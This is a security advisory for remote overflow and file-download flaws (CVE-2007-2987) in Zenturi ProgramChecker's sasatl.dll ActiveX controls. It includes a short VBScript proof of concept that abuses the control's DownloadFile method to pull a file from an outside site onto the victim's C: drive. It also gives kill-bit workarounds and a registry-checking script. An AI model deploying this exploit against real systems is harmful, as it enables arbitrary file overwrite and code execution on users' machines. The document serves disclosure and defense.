Zenturi ProgramChecker sasatl.dll ActiveX Control Multiple Remote Overflow Vulnerabilities
Published: 2007-05-29
Updated: 2007-05-31
Affected systems:
Zenturi ProgramChecker ActiveX
Description:
BUGTRAQ ID: 24217
CVE(CAN) ID: CVE-2007-2987
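Zenturi ProgramChecker is a suite of programs for analyzing, verifying, certifying and searching for the programs running on a PC.
Several ActiveX controls provided by Zenturi ProgramChecker's sasatl.dll contain multiple overflow vulnerabilities in the way they handle certain parameters. If a user is tricked into visiting a malicious site that passes an overly long string to a vulnerable parameter, these overflows can be triggered, leading to execution of arbitrary instructions.
<*Source: Will Dormann
Links: http://secunia.com/advisories/25473/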
http://www.kb.cert.org/vuls/id/603529
http://secunia.com/advisories/25468/
*>
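Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use it at your own risk!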
2007/05/30
-------------------------------------------------------------------------------------------
Zenturi ProgramChecker ActiveX (sasatl.dll) Arbitrary file download/overwrite Exploit
url: http://www[dot]programchecker[dot]com/activeintro.aspx
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
All software that uses this ocx is vulnerable to this exploit.
Using the "DownloadFile" method, you can download everything you want on a pc. This
exploit just downloads a txt file on the pc; I tried to overwrite cmd.exe and it works.
-------------------------------------------------------------------------------------------
<object classid='clsid:59DBDDA6-9A80-42A4-B824-9BC50CC172F5' id='test' ></object>
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language='vbscript'>
Sub tryMe()
test.DownloadFile "http://www.shinnai.altervista.org/shinnai.txt" ,"c:\shinnai.txt" ,"0", "0"
End Sub
</script>
Recommendation:
Temporary workaround:
* Set the kill bit in IE for the following CLSIDs:
{048313BB-3B82-47A8-8164-533F1D7C7C9D}
{0FA0B4FF-1A6F-4D89-995C-29FFD33F4EE0}
{59DBDDA6-9A80-42A4-B824-9BC50CC172F5}
{66C7B32A-9642-41A4-BCF7-A166D1547770}
{6754F588-E262-42D2-A6BC-3BB400ACFEED}
{7D6B5B24-FC7E-11D1-9288-00104B885781}
{A364AF35-0CDF-41E8-8F3B-E0E55E15EBA1}
Or save the following text as a .REG file and import it:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{048313BB-3B82-47A8-8164-533F1D7C7C9D}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0FA0B4FF-1A6F-4D89-995C-29FFD33F4EE0}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{59DBDDA6-9A80-42A4-B824-9BC50CC172F5}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{66C7B32A-9642-41A4-BCF7-A166D1547770}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{6754F588-E262-42D2-A6BC-3BB400ACFEED}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{7D6B5B24-FC7E-11D1-9288-00104B885781}]
"Compatibility Flags"=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A364AF35-0CDF-41E8-8F3B-E0E55E15EBA1}]
"Compatibility Flags"=dword:00000400
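To confirm the workaround took effect, the following added example (not part of the original advisory) parses a text export of the ActiveX Compatibility key and reports which of the seven CLSIDs above still lack the kill bit. The function names and the sample export are constructed for illustration; a real export file is typically UTF-16 and must be decoded to text before it is passed in.

```python
import re

KILL_BIT = 0x400  # "Compatibility Flags" value the advisory's .REG text sets
COMPAT_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
ADVISORY_CLSIDS = [  # the seven CLSIDs listed in the workaround
    "{048313BB-3B82-47A8-8164-533F1D7C7C9D}", "{0FA0B4FF-1A6F-4D89-995C-29FFD33F4EE0}",
    "{59DBDDA6-9A80-42A4-B824-9BC50CC172F5}", "{66C7B32A-9642-41A4-BCF7-A166D1547770}",
    "{6754F588-E262-42D2-A6BC-3BB400ACFEED}", "{7D6B5B24-FC7E-11D1-9288-00104B885781}",
    "{A364AF35-0CDF-41E8-8F3B-E0E55E15EBA1}",
]
# Constructed sample export: two kill bits set, one flag value of 0, four keys absent.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{048313BB-3B82-47A8-8164-533F1D7C7C9D}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0FA0B4FF-1A6F-4D89-995C-29FFD33F4EE0}]
"Compatibility Flags"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{59dbdda6-9a80-42a4-b824-9bc50cc172f5}]
"Compatibility Flags"=dword:00000400
"""

def parse_compat_flags(reg_text):
    """Map upper-cased CLSID -> Compatibility Flags value found in .REG text."""
    flags, current = {}, None
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            current = None  # a new key starts; forget the previous one
            m = re.fullmatch(r"\[(.+)\\(\{[0-9A-Fa-f-]{36}\})\]", line)
            if m and m.group(1).lower() == COMPAT_KEY.lower():
                current = m.group(2).upper()
        elif current:
            m = re.fullmatch(r'"Compatibility Flags"=dword:([0-9A-Fa-f]{1,8})', line, re.I)
            if m:
                flags[current] = int(m.group(1), 16)
    return flags

def missing_kill_bits(reg_text, clsids=ADVISORY_CLSIDS):
    """Return the CLSIDs whose key is absent or whose flags lack the kill bit."""
    flags = parse_compat_flags(reg_text)
    return [c for c in clsids if not flags.get(c.upper(), 0) & KILL_BIT]

if __name__ == "__main__":
    print("Kill bit not set for:", missing_kill_bits(SAMPLE_EXPORT))
```

An empty result means every CLSID from the advisory carries the kill bit in the exported key.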
Vendor patch:
Zenturi
-------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:
http://www[dot]programchecker[dot]com/
